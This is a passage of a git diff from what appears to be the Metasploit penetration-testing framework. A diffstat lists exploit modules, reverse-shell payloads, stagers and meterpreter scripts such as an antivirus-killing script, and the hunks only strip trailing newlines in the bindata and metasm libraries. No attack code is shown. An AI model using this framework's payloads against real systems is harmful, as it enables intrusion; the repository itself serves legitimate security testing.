.../exploits/windows/tftp/quick_tftp_pro_mode.rb | 2 +- .../exploits/windows/tftp/tftpd32_long_filename.rb | 3 +-- .../windows/tftp/tftpdwin_long_filename.rb | 3 +-- .../windows/tftp/threectftpsvc_long_mode.rb | 3 +-- .../exploits/windows/unicenter/cam_log_security.rb | 3 +-- modules/exploits/windows/vnc/realvnc_client.rb | 3 +-- modules/exploits/windows/vnc/ultravnc_client.rb | 3 +-- modules/exploits/windows/vnc/winvnc_http_get.rb | 4 +--- modules/exploits/windows/wins/ms04_045_wins.rb | 3 +-- modules/modules.rb.ts.rb | 2 +- modules/nops/armle/simple.rb | 4 +--- modules/nops/nop_test.rb.ut.rb | 2 +- modules/nops/php/generic.rb | 4 +--- modules/nops/ppc/simple.rb | 4 +--- modules/nops/sparc/random.rb | 4 +--- modules/nops/x86/opty2.rb | 4 +--- modules/nops/x86/single_byte.rb | 4 +--- .../payloads/singles/aix/power/shell_bind_tcp.rb | 4 +--- .../payloads/singles/aix/power/shell_find_port.rb | 4 +--- .../singles/aix/power/shell_reverse_tcp.rb | 4 +--- .../payloads/singles/bsd/sparc/shell_bind_tcp.rb | 4 +--- .../singles/bsd/sparc/shell_reverse_tcp.rb | 4 +--- modules/payloads/singles/bsd/x86/exec.rb | 4 +--- modules/payloads/singles/bsd/x86/shell_bind_tcp.rb | 4 +--- .../payloads/singles/bsd/x86/shell_find_port.rb | 4 +--- modules/payloads/singles/bsd/x86/shell_find_tag.rb | 4 +--- .../payloads/singles/bsd/x86/shell_reverse_tcp.rb | 4 +--- .../payloads/singles/bsdi/x86/shell_bind_tcp.rb | 4 +--- .../payloads/singles/bsdi/x86/shell_find_port.rb | 4 +--- .../payloads/singles/bsdi/x86/shell_reverse_tcp.rb | 4 +--- modules/payloads/singles/cmd/unix/bind_inetd.rb | 4 +--- modules/payloads/singles/cmd/unix/bind_perl.rb | 4 +--- modules/payloads/singles/cmd/unix/generic.rb | 4 +--- modules/payloads/singles/cmd/unix/interact.rb | 4 +--- modules/payloads/singles/cmd/unix/reverse.rb | 4 +--- modules/payloads/singles/cmd/unix/reverse_bash.rb | 4 +--- modules/payloads/singles/cmd/unix/reverse_perl.rb | 4 +--- modules/payloads/singles/cmd/windows/bind_perl.rb | 4 +--- .../payloads/singles/cmd/windows/reverse_perl.rb | 4 +--- modules/payloads/singles/generic/debug_trap.rb | 4 +--- modules/payloads/singles/generic/shell_bind_tcp.rb | 4 +--- .../payloads/singles/generic/shell_reverse_tcp.rb | 4 +--- .../singles/linux/mipsbe/shell_reverse_tcp.rb | 4 +--- .../singles/linux/mipsle/shell_reverse_tcp.rb | 4 +--- modules/payloads/singles/linux/x86/adduser.rb | 4 +--- modules/payloads/singles/linux/x86/chmod.rb | 5 +---- modules/payloads/singles/linux/x86/exec.rb | 4 +--- .../payloads/singles/linux/x86/shell_bind_tcp.rb | 4 +--- .../payloads/singles/linux/x86/shell_find_port.rb | 4 +--- .../payloads/singles/linux/x86/shell_find_tag.rb | 4 +--- .../singles/linux/x86/shell_reverse_tcp.rb | 4 +--- .../singles/linux/x86/shell_reverse_tcp2.rb | 4 +--- .../payloads/singles/osx/armle/shell_bind_tcp.rb | 4 +--- .../singles/osx/armle/shell_reverse_tcp.rb | 4 +--- modules/payloads/singles/osx/armle/vibrate.rb | 4 +--- modules/payloads/singles/osx/ppc/shell_bind_tcp.rb | 4 +--- .../payloads/singles/osx/ppc/shell_reverse_tcp.rb | 4 +--- modules/payloads/singles/osx/x86/exec.rb | 4 +--- modules/payloads/singles/osx/x86/shell_bind_tcp.rb | 4 +--- .../payloads/singles/osx/x86/shell_find_port.rb | 4 +--- .../payloads/singles/osx/x86/shell_reverse_tcp.rb | 4 +--- modules/payloads/singles/php/bind_perl.rb | 4 +--- modules/payloads/singles/php/bind_php.rb | 4 +--- modules/payloads/singles/php/exec.rb | 4 +--- modules/payloads/singles/php/reverse_perl.rb | 4 +--- modules/payloads/singles/php/reverse_php.rb | 4 +--- modules/payloads/singles/php/shell_findsock.rb | 4 +--- .../singles/solaris/sparc/shell_bind_tcp.rb | 4 +--- .../singles/solaris/sparc/shell_find_port.rb | 4 +--- .../singles/solaris/sparc/shell_reverse_tcp.rb | 4 +--- .../payloads/singles/solaris/x86/shell_bind_tcp.rb | 4 +--- .../singles/solaris/x86/shell_find_port.rb | 4 +--- .../singles/solaris/x86/shell_reverse_tcp.rb | 4 +--- modules/payloads/singles/windows/adduser.rb | 4 +--- modules/payloads/singles/windows/download_exec.rb | 4 +--- modules/payloads/singles/windows/exec.rb | 4 +--- modules/payloads/singles/windows/shell_bind_tcp.rb | 4 +--- .../singles/windows/shell_bind_tcp_xpfw.rb | 4 +--- .../payloads/singles/windows/shell_reverse_tcp.rb | 4 +--- modules/payloads/stagers/bsd/x86/bind_tcp.rb | 4 +--- modules/payloads/stagers/bsd/x86/find_tag.rb | 4 +--- modules/payloads/stagers/bsd/x86/reverse_tcp.rb | 4 +--- modules/payloads/stagers/bsdi/x86/bind_tcp.rb | 4 +--- modules/payloads/stagers/bsdi/x86/reverse_tcp.rb | 4 +--- modules/payloads/stagers/linux/x86/bind_tcp.rb | 4 +--- modules/payloads/stagers/linux/x86/find_tag.rb | 4 +--- modules/payloads/stagers/linux/x86/reverse_tcp.rb | 4 +--- modules/payloads/stagers/netware/reverse_tcp.rb | 4 +--- modules/payloads/stagers/osx/armle/bind_tcp.rb | 4 +--- modules/payloads/stagers/osx/armle/reverse_tcp.rb | 4 +--- modules/payloads/stagers/osx/ppc/bind_tcp.rb | 4 +--- modules/payloads/stagers/osx/ppc/find_tag.rb | 4 +--- modules/payloads/stagers/osx/ppc/reverse_tcp.rb | 4 +--- modules/payloads/stagers/windows/bind_ipv6_tcp.rb | 4 +--- modules/payloads/stagers/windows/bind_nonx_tcp.rb | 4 +--- modules/payloads/stagers/windows/bind_tcp.rb | 4 +--- modules/payloads/stagers/windows/findtag_ord.rb | 4 +--- modules/payloads/stagers/windows/passivex.rb | 4 +--- .../payloads/stagers/windows/reverse_ipv6_tcp.rb | 4 +--- .../payloads/stagers/windows/reverse_nonx_tcp.rb | 4 +--- .../payloads/stagers/windows/reverse_ord_tcp.rb | 4 +--- modules/payloads/stagers/windows/reverse_tcp.rb | 4 +--- modules/payloads/stages/bsd/x86/shell.rb | 4 +--- modules/payloads/stages/bsdi/x86/shell.rb | 4 +--- modules/payloads/stages/linux/x86/shell.rb | 4 +--- modules/payloads/stages/netware/shell.rb | 4 +--- modules/payloads/stages/osx/armle/execute.rb | 4 +--- modules/payloads/stages/osx/armle/shell.rb | 4 +--- modules/payloads/stages/osx/ppc/shell.rb | 4 +--- modules/payloads/stages/windows/dllinject.rb | 4 +--- modules/payloads/stages/windows/meterpreter.rb | 4 +--- modules/payloads/stages/windows/shell.rb | 4 +--- modules/payloads/stages/windows/upexec.rb | 4 +--- modules/payloads/stages/windows/vncinject.rb | 4 +--- msfcli | 2 +- msfconsole | 2 +- msfd | 2 +- msfelfscan | 2 +- msfencode | 2 +- msfgui | 4 +--- msfmachscan | 3 +-- msfopcode | 3 +-- msfpayload | 2 +- msfpescan | 2 +- msfweb | 3 +-- plugins/db_mysql.rb | 2 +- plugins/db_postgres.rb | 2 +- plugins/db_sqlite2.rb | 2 +- plugins/db_sqlite3.rb | 2 +- plugins/db_tracker.rb | 2 +- plugins/db_wmap.rb | 2 +- plugins/ips_filter.rb | 2 +- plugins/msfd.rb | 2 +- plugins/sample.rb | 2 +- plugins/session_tagger.rb | 2 +- plugins/socket_logger.rb | 2 +- plugins/thread.rb | 4 +--- scripts/meterpreter/get_local_subnets.rb | 3 +-- scripts/meterpreter/killav.rb | 3 +-- scripts/meterpreter/migrate.rb | 2 +- scripts/meterpreter/search_dwld.rb | 3 +-- tools/convert_31.rb | 2 +- tools/module_license.rb | 2 +- tools/module_reference.rb | 2 +- tools/msf_irb_shell.rb | 2 +- tools/nasm_shell.rb | 2 +- tools/pattern_create.rb | 2 +- tools/pattern_offset.rb | 2 +- 1264 files changed, 1264 insertions(+), 2079 deletions(-) diff --git a/lib/bindata.rb b/lib/bindata.rb index 986c3d13f4..d1ce4f6d0b 100644 --- a/lib/bindata.rb +++ b/lib/bindata.rb @@ -19,4 +19,4 @@ require 'bindata/struct' # module BinData VERSION = "0.9.2-eofpatch" # Temporary fork for PacketFu. -end +end \ No newline at end of file diff --git a/lib/bindata/array.rb b/lib/bindata/array.rb index 6347367796..8987489f64 100644 --- a/lib/bindata/array.rb +++ b/lib/bindata/array.rb @@ -327,4 +327,4 @@ module BinData element end end -end +end \ No newline at end of file diff --git a/lib/bindata/base.rb b/lib/bindata/base.rb index 348c8170ae..53d4f2d815 100644 --- a/lib/bindata/base.rb +++ b/lib/bindata/base.rb @@ -377,4 +377,4 @@ module BinData # End To be implemented by subclasses ########################################################################### end -end +end \ No newline at end of file diff --git a/lib/bindata/bits.rb b/lib/bindata/bits.rb index 07efb4eb15..d3ce4a229e 100644 --- a/lib/bindata/bits.rb +++ b/lib/bindata/bits.rb @@ -804,4 +804,4 @@ module BinData register(self.name, self) BitField.create_methods(self, 63, :little) end -end +end \ No newline at end of file diff --git a/lib/bindata/choice.rb b/lib/bindata/choice.rb index 7acc5cc40f..f5e8a7f092 100644 --- a/lib/bindata/choice.rb +++ b/lib/bindata/choice.rb @@ -160,4 +160,4 @@ module BinData obj end end -end +end \ No newline at end of file diff --git a/lib/bindata/float.rb b/lib/bindata/float.rb index 0c14bf1409..34b5e4958d 100644 --- a/lib/bindata/float.rb +++ b/lib/bindata/float.rb @@ -85,4 +85,4 @@ module BinData register(self.name, self) Float.create_float_methods(self, false, :big) end -end +end \ No newline at end of file diff --git a/lib/bindata/int.rb b/lib/bindata/int.rb index c5369f7556..03c211a3e0 100644 --- a/lib/bindata/int.rb +++ b/lib/bindata/int.rb @@ -182,4 +182,4 @@ module BinData register(self.name, self) Integer.create_int_methods(self, 64, :big) end -end +end \ No newline at end of file diff --git a/lib/bindata/io.rb b/lib/bindata/io.rb index efe89b4518..3f1295a24c 100644 --- a/lib/bindata/io.rb +++ b/lib/bindata/io.rb @@ -189,4 +189,4 @@ module BinData alias_method :flush, :flushbits end -end +end \ No newline at end of file diff --git a/lib/bindata/lazy.rb b/lib/bindata/lazy.rb index 7c05e857cb..474b6b24e6 100644 --- a/lib/bindata/lazy.rb +++ b/lib/bindata/lazy.rb @@ -108,4 +108,4 @@ module BinData end end end -end +end \ No newline at end of file diff --git a/lib/bindata/multi_value.rb b/lib/bindata/multi_value.rb index 0252424484..21444b79c9 100644 --- a/lib/bindata/multi_value.rb +++ b/lib/bindata/multi_value.rb @@ -131,4 +131,4 @@ module BinData end end end -end +end \ No newline at end of file diff --git a/lib/bindata/my_array.rb b/lib/bindata/my_array.rb index 1d9f642655..277fe7533b 100644 --- a/lib/bindata/my_array.rb +++ b/lib/bindata/my_array.rb @@ -338,4 +338,4 @@ module BinData @element_list.pop end end -end +end \ No newline at end of file diff --git a/lib/bindata/registry.rb b/lib/bindata/registry.rb index 70a3f7b6f0..4eab383d80 100644 --- a/lib/bindata/registry.rb +++ b/lib/bindata/registry.rb @@ -39,4 +39,4 @@ module BinData @registry[name.to_s] end end -end +end \ No newline at end of file diff --git a/lib/bindata/rest.rb b/lib/bindata/rest.rb index 1ac20fbc31..f2439fbaea 100644 --- a/lib/bindata/rest.rb +++ b/lib/bindata/rest.rb @@ -38,4 +38,4 @@ module BinData "" end end -end +end \ No newline at end of file diff --git a/lib/bindata/sanitize.rb b/lib/bindata/sanitize.rb index 32277e6c17..74df824cbe 100644 --- a/lib/bindata/sanitize.rb +++ b/lib/bindata/sanitize.rb @@ -117,5 +117,4 @@ module BinData def_delegators :@hash, :[], :has_key?, :include?, :keys end -end - +end \ No newline at end of file diff --git a/lib/bindata/single.rb b/lib/bindata/single.rb index 2bda708a30..426827aeba 100644 --- a/lib/bindata/single.rb +++ b/lib/bindata/single.rb @@ -174,4 +174,4 @@ module BinData # To be implemented by subclasses ########################################################################### end -end +end \ No newline at end of file diff --git a/lib/bindata/single_value.rb b/lib/bindata/single_value.rb index 2244d23f98..030f768c96 100644 --- a/lib/bindata/single_value.rb +++ b/lib/bindata/single_value.rb @@ -191,4 +191,4 @@ module BinData # To be implemented by subclasses ########################################################################### end -end +end \ No newline at end of file diff --git a/lib/bindata/string.rb b/lib/bindata/string.rb index c89c8ff8d6..154faba8d1 100644 --- a/lib/bindata/string.rb +++ b/lib/bindata/string.rb @@ -112,4 +112,4 @@ module BinData "" end end -end +end \ No newline at end of file diff --git a/lib/bindata/stringz.rb b/lib/bindata/stringz.rb index 92c42068b2..32d11d73c4 100644 --- a/lib/bindata/stringz.rb +++ b/lib/bindata/stringz.rb @@ -95,4 +95,4 @@ module BinData result end end -end +end \ No newline at end of file diff --git a/lib/bindata/struct.rb b/lib/bindata/struct.rb index 4f2dd16134..a12017a6da 100644 --- a/lib/bindata/struct.rb +++ b/lib/bindata/struct.rb @@ -380,4 +380,4 @@ module BinData hash end end -end +end \ No newline at end of file diff --git a/lib/metasm.rb b/lib/metasm.rb index 97932d49d5..9fdb3534f3 100644 --- a/lib/metasm.rb +++ b/lib/metasm.rb @@ -1 +1 @@ -require 'metasm/metasm' +require 'metasm/metasm' \ No newline at end of file diff --git a/lib/metasm/metasm-shell.rb b/lib/metasm/metasm-shell.rb index d3b5b9e35b..c188f3bfa9 100644 --- a/lib/metasm/metasm-shell.rb +++ b/lib/metasm/metasm-shell.rb @@ -67,4 +67,4 @@ end if __FILE__ == $0 asm -end +end \ No newline at end of file diff --git a/lib/metasm/metasm.rb b/lib/metasm/metasm.rb index 4b35acde43..966e985624 100644 --- a/lib/metasm/metasm.rb +++ b/lib/metasm/metasm.rb @@ -33,4 +33,4 @@ require 'metasm/parse_c' require 'metasm/compile_c' # cleanup include path -$:.delete metasmdir if metasmdir +$:.delete metasmdir if metasmdir \ No newline at end of file diff --git a/lib/metasm/metasm/arm/encode.rb b/lib/metasm/metasm/arm/encode.rb index e52cdd195a..5571dbd5e6 100644 --- a/lib/metasm/metasm/arm/encode.rb +++ b/lib/metasm/metasm/arm/encode.rb @@ -37,4 +37,4 @@ class MIPS Expression[base, :+, [[val, :&, mask], :<<, shift]].encode(:u32, @endianness) end end -end +end \ No newline at end of file diff --git a/lib/metasm/metasm/arm/main.rb b/lib/metasm/metasm/arm/main.rb index 7d4d7b467a..4b3c96f2f1 100644 --- a/lib/metasm/metasm/arm/main.rb +++ b/lib/metasm/metasm/arm/main.rb @@ -35,5 +35,4 @@ class ARM < CPU init end end -end - +end \ No newline at end of file diff --git a/lib/metasm/metasm/arm/opcodes.rb b/lib/metasm/metasm/arm/opcodes.rb index f3d9eb82f7..caffeb8046 100644 --- a/lib/metasm/metasm/arm/opcodes.rb +++ b/lib/metasm/metasm/arm/opcodes.rb @@ -416,4 +416,4 @@ end init_mips32 end -end +end \ No newline at end of file diff --git a/lib/metasm/metasm/arm/parse.rb b/lib/metasm/metasm/arm/parse.rb index bd7c0ea8a8..48a02b7ce2 100644 --- a/lib/metasm/metasm/arm/parse.rb +++ b/lib/metasm/metasm/arm/parse.rb @@ -37,4 +37,4 @@ class ARM arg end end -end +end \ No newline at end of file diff --git a/lib/metasm/metasm/compile_c.rb b/lib/metasm/metasm/compile_c.rb index 64edb042dd..828fd07c7c 100644 --- a/lib/metasm/metasm/compile_c.rb +++ b/lib/metasm/metasm/compile_c.rb @@ -1415,4 +1415,4 @@ module C end end end -end +end \ No newline at end of file diff --git a/lib/metasm/metasm/decode.rb b/lib/metasm/metasm/decode.rb index 564ead2915..1fee85c313 100644 --- a/lib/metasm/metasm/decode.rb +++ b/lib/metasm/metasm/decode.rb @@ -1917,4 +1917,4 @@ puts " backtrace_indirection for #{ind.target} failed: #{ev}" if debug_backtra edata.ptr end end -end +end \ No newline at end of file diff --git a/lib/metasm/metasm/encode.rb b/lib/metasm/metasm/encode.rb index c452ed457c..3624b2b707 100644 --- a/lib/metasm/metasm/encode.rb +++ b/lib/metasm/metasm/encode.rb @@ -307,4 +307,4 @@ class CPU oplist.map { |op| encode_instr_op(program, i, op) }.flatten.each { |ed| ed.reloc.each_value { |v| v.backtrace = i.backtrace } } end end -end +end \ No newline at end of file diff --git a/lib/metasm/metasm/exe_format/a_out.rb b/lib/metasm/metasm/exe_format/a_out.rb index 6a4e9bb918..f3daadfc88 100644 --- a/lib/metasm/metasm/exe_format/a_out.rb +++ b/lib/metasm/metasm/exe_format/a_out.rb @@ -284,4 +284,4 @@ class AOut < ExeFormat yield @data, tva + @text.virtsize end end -end +end \ No newline at end of file diff --git a/lib/metasm/metasm/exe_format/autoexe.rb b/lib/metasm/metasm/exe_format/autoexe.rb index 3ff32cf623..cdc3ece655 100644 --- a/lib/metasm/metasm/exe_format/autoexe.rb +++ b/lib/metasm/metasm/exe_format/autoexe.rb @@ -35,4 +35,4 @@ def self.orshellcode(cpu=Ia32.new) c end end -end +end \ No newline at end of file diff --git a/lib/metasm/metasm/exe_format/coff.rb b/lib/metasm/metasm/exe_format/coff.rb index 8bbc48fb5f..7b3f21e5a0 100644 --- a/lib/metasm/metasm/exe_format/coff.rb +++ b/lib/metasm/metasm/exe_format/coff.rb @@ -341,4 +341,4 @@ puts "String table: 0x%.8x .. 0x%.8x" % [offset, endoffset] offset += 1 end end -end +end \ No newline at end of file diff --git a/lib/metasm/metasm/exe_format/coff_decode.rb b/lib/metasm/metasm/exe_format/coff_decode.rb index a6cc161b05..59e7f66137 100644 --- a/lib/metasm/metasm/exe_format/coff_decode.rb +++ b/lib/metasm/metasm/exe_format/coff_decode.rb @@ -750,4 +750,4 @@ class COFFArchive } end end -end +end \ No newline at end of file diff --git a/lib/metasm/metasm/exe_format/coff_encode.rb b/lib/metasm/metasm/exe_format/coff_encode.rb index 6245b88139..383d58e0e0 100644 --- a/lib/metasm/metasm/exe_format/coff_encode.rb +++ b/lib/metasm/metasm/exe_format/coff_encode.rb @@ -1030,4 +1030,4 @@ class COFF } end end -end +end \ No newline at end of file diff --git a/lib/metasm/metasm/exe_format/elf.rb b/lib/metasm/metasm/exe_format/elf.rb index b394317de3..8fabab67ac 100644 --- a/lib/metasm/metasm/exe_format/elf.rb +++ b/lib/metasm/metasm/exe_format/elf.rb @@ -597,5 +597,4 @@ typedef struct { #define SYMINFO_CURRENT 1 #define SYMINFO_NUM 2 - P - + P \ No newline at end of file diff --git a/lib/metasm/metasm/exe_format/elf_decode.rb b/lib/metasm/metasm/exe_format/elf_decode.rb index ac26be085a..f34d37f376 100644 --- a/lib/metasm/metasm/exe_format/elf_decode.rb +++ b/lib/metasm/metasm/exe_format/elf_decode.rb @@ -722,4 +722,4 @@ class LoadedELF < ELF decode_program_header(@header.phoff+off) end end -end +end \ No newline at end of file diff --git a/lib/metasm/metasm/exe_format/elf_encode.rb b/lib/metasm/metasm/exe_format/elf_encode.rb index 35cd80c9db..dc687212df 100644 --- a/lib/metasm/metasm/exe_format/elf_encode.rb +++ b/lib/metasm/metasm/exe_format/elf_encode.rb @@ -1227,4 +1227,4 @@ foo: call bla_plt ret foo_end: -EOS +EOS \ No newline at end of file diff --git a/lib/metasm/metasm/exe_format/main.rb b/lib/metasm/metasm/exe_format/main.rb index c881c5e73c..64d207a67d 100644 --- a/lib/metasm/metasm/exe_format/main.rb +++ b/lib/metasm/metasm/exe_format/main.rb @@ -169,4 +169,4 @@ class ExeFormat (val.kind_of?(Integer) ? (hash.find_all { |k, v| val & k == k and val &= ~k }.map { |k, v| v } << val) : val.kind_of?(Array) ? val.map { |e| int_to_hash(e, hash) } : [int_to_hash(val, hash)]) - [0] end end -end +end \ No newline at end of file diff --git a/lib/metasm/metasm/exe_format/mz.rb b/lib/metasm/metasm/exe_format/mz.rb index 4771085899..c1c4cff28e 100644 --- a/lib/metasm/metasm/exe_format/mz.rb +++ b/lib/metasm/metasm/exe_format/mz.rb @@ -182,4 +182,4 @@ class MZ < ExeFormat yield @body, 0 end end -end +end \ No newline at end of file diff --git a/lib/metasm/metasm/exe_format/pe.rb b/lib/metasm/metasm/exe_format/pe.rb index 3a29308185..bb1f43a505 100644 --- a/lib/metasm/metasm/exe_format/pe.rb +++ b/lib/metasm/metasm/exe_format/pe.rb @@ -350,4 +350,4 @@ class LoadedPE < PE } if @imports end end -end +end \ No newline at end of file diff --git a/lib/metasm/metasm/exe_format/shellcode.rb b/lib/metasm/metasm/exe_format/shellcode.rb index fa8183b91e..cf4455fecb 100644 --- a/lib/metasm/metasm/exe_format/shellcode.rb +++ b/lib/metasm/metasm/exe_format/shellcode.rb @@ -93,4 +93,4 @@ class Shellcode < ExeFormat c end end -end +end \ No newline at end of file diff --git a/lib/metasm/metasm/exe_format/xcoff.rb b/lib/metasm/metasm/exe_format/xcoff.rb index e937a42eac..8b12d4750f 100644 --- a/lib/metasm/metasm/exe_format/xcoff.rb +++ b/lib/metasm/metasm/exe_format/xcoff.rb @@ -269,4 +269,4 @@ class XCoff < ExeFormat @encoded.data end end -end +end \ No newline at end of file diff --git a/lib/metasm/metasm/gui/gtk.rb b/lib/metasm/metasm/gui/gtk.rb index 459420872a..7bf57fa4e6 100644 --- a/lib/metasm/metasm/gui/gtk.rb +++ b/lib/metasm/metasm/gui/gtk.rb @@ -369,4 +369,4 @@ class MainWindow < Gtk::Window end end -end +end \ No newline at end of file diff --git a/lib/metasm/metasm/gui/gtk_graph.rb b/lib/metasm/metasm/gui/gtk_graph.rb index fb52da7b35..34ae0388b3 100644 --- a/lib/metasm/metasm/gui/gtk_graph.rb +++ b/lib/metasm/metasm/gui/gtk_graph.rb @@ -1016,4 +1016,4 @@ class GraphViewWidget < Gtk::HBox end end end -end +end \ No newline at end of file diff --git a/lib/metasm/metasm/gui/gtk_listing.rb b/lib/metasm/metasm/gui/gtk_listing.rb index b03c23d58c..67711f4c35 100644 --- a/lib/metasm/metasm/gui/gtk_listing.rb +++ b/lib/metasm/metasm/gui/gtk_listing.rb @@ -518,4 +518,4 @@ class AsmListingWidget < Gtk::HBox end end end -end +end \ No newline at end of file diff --git a/lib/metasm/metasm/ia32/compile_c.rb b/lib/metasm/metasm/ia32/compile_c.rb index 63591b7931..ecdeb3904a 100644 --- a/lib/metasm/metasm/ia32/compile_c.rb +++ b/lib/metasm/metasm/ia32/compile_c.rb @@ -1274,4 +1274,4 @@ end CCompiler.new(parser, exe) end end -end +end \ No newline at end of file diff --git a/lib/metasm/metasm/ia32/decode.rb b/lib/metasm/metasm/ia32/decode.rb index 460c03afbe..4d74fdcb96 100644 --- a/lib/metasm/metasm/ia32/decode.rb +++ b/lib/metasm/metasm/ia32/decode.rb @@ -785,4 +785,4 @@ class Ia32 f end end -end +end \ No newline at end of file diff --git a/lib/metasm/metasm/ia32/encode.rb b/lib/metasm/metasm/ia32/encode.rb index ea886dfce8..6cce9fa704 100644 --- a/lib/metasm/metasm/ia32/encode.rb +++ b/lib/metasm/metasm/ia32/encode.rb @@ -294,4 +294,4 @@ class Ia32 ret end end -end +end \ No newline at end of file diff --git a/lib/metasm/metasm/ia32/main.rb b/lib/metasm/metasm/ia32/main.rb index fb297c8b10..fdee505bd8 100644 --- a/lib/metasm/metasm/ia32/main.rb +++ b/lib/metasm/metasm/ia32/main.rb @@ -151,4 +151,4 @@ class Ia32 < CPU end end -end +end \ No newline at end of file diff --git a/lib/metasm/metasm/ia32/opcodes.rb b/lib/metasm/metasm/ia32/opcodes.rb index fe1cfe7c7d..788c8151d2 100644 --- a/lib/metasm/metasm/ia32/opcodes.rb +++ b/lib/metasm/metasm/ia32/opcodes.rb @@ -784,4 +784,4 @@ class Ia32 @opcode_list << op end end -end +end \ No newline at end of file diff --git a/lib/metasm/metasm/ia32/parse.rb b/lib/metasm/metasm/ia32/parse.rb index f1dab49cd0..67db0a3b5b 100644 --- a/lib/metasm/metasm/ia32/parse.rb +++ b/lib/metasm/metasm/ia32/parse.rb @@ -298,4 +298,4 @@ end end end end -end +end \ No newline at end of file diff --git a/lib/metasm/metasm/ia32/render.rb b/lib/metasm/metasm/ia32/render.rb index 227595c547..8d02b441fb 100644 --- a/lib/metasm/metasm/ia32/render.rb +++ b/lib/metasm/metasm/ia32/render.rb @@ -90,4 +90,4 @@ class Ia32 h end end -end +end \ No newline at end of file diff --git a/lib/metasm/metasm/main.rb b/lib/metasm/metasm/main.rb index 81ec973fdf..351326f92a 100644 --- a/lib/metasm/metasm/main.rb +++ b/lib/metasm/metasm/main.rb @@ -943,4 +943,4 @@ class EncodedData self[from, content.length] = content end end -end +end \ No newline at end of file diff --git a/lib/metasm/metasm/mips/compile_c.rb b/lib/metasm/metasm/mips/compile_c.rb index ab03035878..1c828d0388 100644 --- a/lib/metasm/metasm/mips/compile_c.rb +++ b/lib/metasm/metasm/mips/compile_c.rb @@ -4,4 +4,4 @@ # Licence is LGPL, see LICENCE in the top-level directory require 'metasm/mips/parse' -require 'metasm/compile_c' +require 'metasm/compile_c' \ No newline at end of file diff --git a/lib/metasm/metasm/mips/decode.rb b/lib/metasm/metasm/mips/decode.rb index 442c4c63a2..57f8f46a9e 100644 --- a/lib/metasm/metasm/mips/decode.rb +++ b/lib/metasm/metasm/mips/decode.rb @@ -220,4 +220,4 @@ class MIPS df end end -end +end \ No newline at end of file diff --git a/lib/metasm/metasm/mips/encode.rb b/lib/metasm/metasm/mips/encode.rb index 3686cb4567..6b00bc3087 100644 --- a/lib/metasm/metasm/mips/encode.rb +++ b/lib/metasm/metasm/mips/encode.rb @@ -47,4 +47,4 @@ class MIPS Expression[base, :+, [[val, :&, mask], :<<, shift]].encode(:u32, @endianness) << postdata end end -end +end \ No newline at end of file diff --git a/lib/metasm/metasm/mips/main.rb b/lib/metasm/metasm/mips/main.rb index 31deb23df5..261da861a4 100644 --- a/lib/metasm/metasm/mips/main.rb +++ b/lib/metasm/metasm/mips/main.rb @@ -63,5 +63,4 @@ class MIPS < CPU send "init_#{family}" end end -end - +end \ No newline at end of file diff --git a/lib/metasm/metasm/mips/opcodes.rb b/lib/metasm/metasm/mips/opcodes.rb index b7f364713d..526bff382f 100644 --- a/lib/metasm/metasm/mips/opcodes.rb +++ b/lib/metasm/metasm/mips/opcodes.rb @@ -435,4 +435,4 @@ end init_mips32 end -end +end \ No newline at end of file diff --git a/lib/metasm/metasm/mips/parse.rb b/lib/metasm/metasm/mips/parse.rb index c2b8ae4e8f..f8e3e493e3 100644 --- a/lib/metasm/metasm/mips/parse.rb +++ b/lib/metasm/metasm/mips/parse.rb @@ -48,4 +48,4 @@ class MIPS arg end end -end +end \ No newline at end of file diff --git a/lib/metasm/metasm/mips/render.rb b/lib/metasm/metasm/mips/render.rb index b3241f67dd..b236fc3c32 100644 --- a/lib/metasm/metasm/mips/render.rb +++ b/lib/metasm/metasm/mips/render.rb @@ -40,4 +40,4 @@ class MIPS r end end -end +end \ No newline at end of file diff --git a/lib/metasm/metasm/os/linux.rb b/lib/metasm/metasm/os/linux.rb index 9405ff246c..528afae749 100644 --- a/lib/metasm/metasm/os/linux.rb +++ b/lib/metasm/metasm/os/linux.rb @@ -476,4 +476,4 @@ EOL list.each { |export| EXPORT[export] = curlibname } } end -end +end \ No newline at end of file diff --git a/lib/metasm/metasm/os/main.rb b/lib/metasm/metasm/os/main.rb index c20ee1bd93..fed6dcdb35 100644 --- a/lib/metasm/metasm/os/main.rb +++ b/lib/metasm/metasm/os/main.rb @@ -225,4 +225,4 @@ class VirtualFile < VirtualString @fd.read(@length) end end -end +end \ No newline at end of file diff --git a/lib/metasm/metasm/os/windows.rb b/lib/metasm/metasm/os/windows.rb index f8b2a5d227..8e01fd34f3 100644 --- a/lib/metasm/metasm/os/windows.rb +++ b/lib/metasm/metasm/os/windows.rb @@ -1067,5 +1067,4 @@ EOL list.each { |export| EXPORT[export] = curlibname } } end -end - +end \ No newline at end of file diff --git a/lib/metasm/metasm/parse.rb b/lib/metasm/metasm/parse.rb index 2db1fe271e..74e37b89c0 100644 --- a/lib/metasm/metasm/parse.rb +++ b/lib/metasm/metasm/parse.rb @@ -745,4 +745,4 @@ class Expression end end end -end +end \ No newline at end of file diff --git a/lib/metasm/metasm/parse_c.rb b/lib/metasm/metasm/parse_c.rb index 585a7997db..25e916fc9a 100644 --- a/lib/metasm/metasm/parse_c.rb +++ b/lib/metasm/metasm/parse_c.rb @@ -2970,4 +2970,4 @@ EOH end end end -end +end \ No newline at end of file diff --git a/lib/metasm/metasm/pic16c/decode.rb b/lib/metasm/metasm/pic16c/decode.rb index 44ec868f42..0e27add915 100644 --- a/lib/metasm/metasm/pic16c/decode.rb +++ b/lib/metasm/metasm/pic16c/decode.rb @@ -39,4 +39,4 @@ class Pic16c lookaside end end -end +end \ No newline at end of file diff --git a/lib/metasm/metasm/pic16c/main.rb b/lib/metasm/metasm/pic16c/main.rb index 47d0618417..ed90338d30 100644 --- a/lib/metasm/metasm/pic16c/main.rb +++ b/lib/metasm/metasm/pic16c/main.rb @@ -14,4 +14,4 @@ class Pic16c < CPU init end end -end +end \ No newline at end of file diff --git a/lib/metasm/metasm/pic16c/opcode.rb b/lib/metasm/metasm/pic16c/opcode.rb index af9aa41433..4926f9886e 100644 --- a/lib/metasm/metasm/pic16c/opcode.rb +++ b/lib/metasm/metasm/pic16c/opcode.rb @@ -66,4 +66,4 @@ class Pic16c addop 'xorlw', 0b11_1010_0000_0000, :k end end -end +end \ No newline at end of file diff --git a/lib/metasm/metasm/preprocessor.rb b/lib/metasm/metasm/preprocessor.rb index 7db0514ce8..816c0d9bc0 100644 --- a/lib/metasm/metasm/preprocessor.rb +++ b/lib/metasm/metasm/preprocessor.rb @@ -1172,4 +1172,4 @@ class Preprocessor end end end -end +end \ No newline at end of file diff --git a/lib/metasm/metasm/render.rb 